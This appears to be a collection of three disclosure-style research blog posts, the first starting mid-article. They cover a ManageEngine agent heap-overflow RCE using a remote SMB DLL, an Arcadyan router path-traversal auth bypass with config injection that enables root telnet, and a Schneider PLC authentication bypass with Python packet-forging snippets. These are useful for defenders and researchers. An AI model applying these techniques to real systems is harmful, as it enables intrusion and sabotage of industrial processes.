Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

3 August 2021 at 13:03

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, lets see if we can get around it. Searching for where it is referenced in Ghidra we can see that it is only called from another function process_request() which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of _dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests to made to js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js are returning a 404, which normally return all of the info we’re looking for. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referrer header

Without diving into url_token_pass, we can see that it is saying that httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means that the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to fix the Referer header to remove the /images/..%2f then we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function get_token(), but get_token() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something equally strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first places I check for any web interface / application which has utilities like a ping function is to see how those utilities are implemented, because even just a quick Google turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting the configuration file with ARC_SYS_TelnetdEnable=1 would work, as it would then be followed by a conflicting setting later in the file (as ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipdaddress). However, after sending the following request in Burp Suite, and sending a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed that a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected and contacting and tracking them all would become very difficult, and so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in either Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors such as thermostats, pressure, proximity, etc.., and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. stuxnet) to make it into the environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols, FTP, and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Due to it being improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation” first you need to generate a 32 byte random nonce (which is a term for a random number generated once each session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = “\x5a” + check_byte + “\x40\xff\x00”

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = (“\x5a” + check_byte + “\x38\01” + auth_hash + to_send)

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypt” box isn’t checked, this password is in plaintext which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password is stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller was stolen, it might be possible for an attacker to recover this password.

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You can not rely on client side software (a.k.a “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

